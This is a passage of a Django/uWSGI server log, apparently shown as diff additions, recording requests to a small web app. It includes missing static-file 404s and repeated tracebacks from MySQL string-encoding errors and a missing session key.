"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 307/395] 219.228.146.146 () {48 vars in 988 bytes} [Thu Jan 14 07:53:23 2021] POST /kind-manage/? => generated 206957 bytes in 156 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 308/396] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 309/397] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 310/398] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 311/399] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 312/400] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 313/401] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 314/402] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:53:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 315/403] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:53:23 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 316/404] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:53:23 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[] +[pid: 2069|app: 0|req: 317/405] 219.228.146.146 () {40 vars in 898 bytes} [Thu Jan 14 07:53:27 2021] GET /all-2-0-0 => generated 8235 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/406] 219.228.146.146 () {38 vars in 769 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/407] 219.228.146.146 () {38 vars in 767 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/408] 219.228.146.146 () {40 vars in 810 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/409] 219.228.146.146 () {40 vars in 808 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/410] 219.228.146.146 () {40 vars in 826 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/411] 219.228.146.146 () {40 vars in 816 bytes} [Thu Jan 14 07:53:27 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/412] 219.228.146.146 () {40 vars in 878 bytes} [Thu Jan 14 07:53:28 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 2069|app: 0|req: 318/413] 219.228.146.146 () {40 vars in 887 bytes} [Thu Jan 14 07:53:31 2021] GET /home/ => generated 59194 bytes in 52 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 2069|app: 0|req: 319/414] 219.228.146.146 () {40 vars in 886 bytes} [Thu Jan 14 07:53:44 2021] GET /home/ => generated 59193 bytes in 45 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/415] 219.228.146.156 () {38 vars in 859 bytes} [Thu Jan 14 07:53:50 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 320/416] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:54:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[] +[pid: 2069|app: 0|req: 321/417] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:54:36 2021] GET /all-2-0-0 => generated 8235 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 322/418] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:54:38 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/419] 219.228.146.146 () {40 vars in 822 bytes} [Thu Jan 14 07:54:38 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 323/420] 114.87.230.234 () {38 vars in 864 bytes} [Thu Jan 14 07:54:41 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/421] 114.87.230.234 () {40 vars in 864 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/422] 114.87.230.234 () {40 vars in 886 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/423] 114.87.230.234 () {40 vars in 867 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/424] 114.87.230.234 () {40 vars in 866 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/425] 114.87.230.234 () {40 vars in 872 bytes} [Thu Jan 14 07:54:41 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/426] 114.87.230.234 () {40 vars in 847 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/427] 114.87.230.234 () {40 vars in 861 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/428] 114.87.230.234 () {40 vars in 863 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/429] 114.87.230.234 () {40 vars in 845 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/430] 114.87.230.234 () {40 vars in 852 bytes} [Thu Jan 14 07:54:41 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/431] 114.87.230.234 () {40 vars in 907 bytes} [Thu Jan 14 07:54:41 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: 0|req: 324/432] 219.228.146.146 () {48 vars in 969 bytes} [Thu Jan 14 07:54:45 2021] POST /login/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 325/433] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:54:45 2021] GET /home/ => generated 7942 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 326/434] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:54:59 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 327/435] 42.236.10.114 () {34 vars in 791 bytes} [Thu Jan 14 07:55:04 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 328/436] 42.236.10.114 () {40 vars in 877 bytes} [Thu Jan 14 07:55:05 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 330/437] 219.228.146.146 () {40 vars in 906 bytes} [Thu Jan 14 07:55:06 2021] GET /kind-manage/? => generated 8286 bytes in 47 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 330/438] 219.228.146.146 () {48 vars in 989 bytes} [Thu Jan 14 07:55:06 2021] POST /kind-manage/? => generated 206958 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 331/439] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 332/440] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 333/441] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 334/442] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 335/443] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 336/444] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 337/445] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:55:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 338/446] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:55:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 339/447] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:55:07 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 340/448] 114.87.230.234 () {48 vars in 1009 bytes} [Thu Jan 14 07:55:09 2021] POST /login/ => generated 209801 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 341/449] 219.228.146.146 () {42 vars in 937 bytes} [Thu Jan 14 07:55:11 2021] GET /kind-manage/? => generated 8286 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 342/450] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:55:12 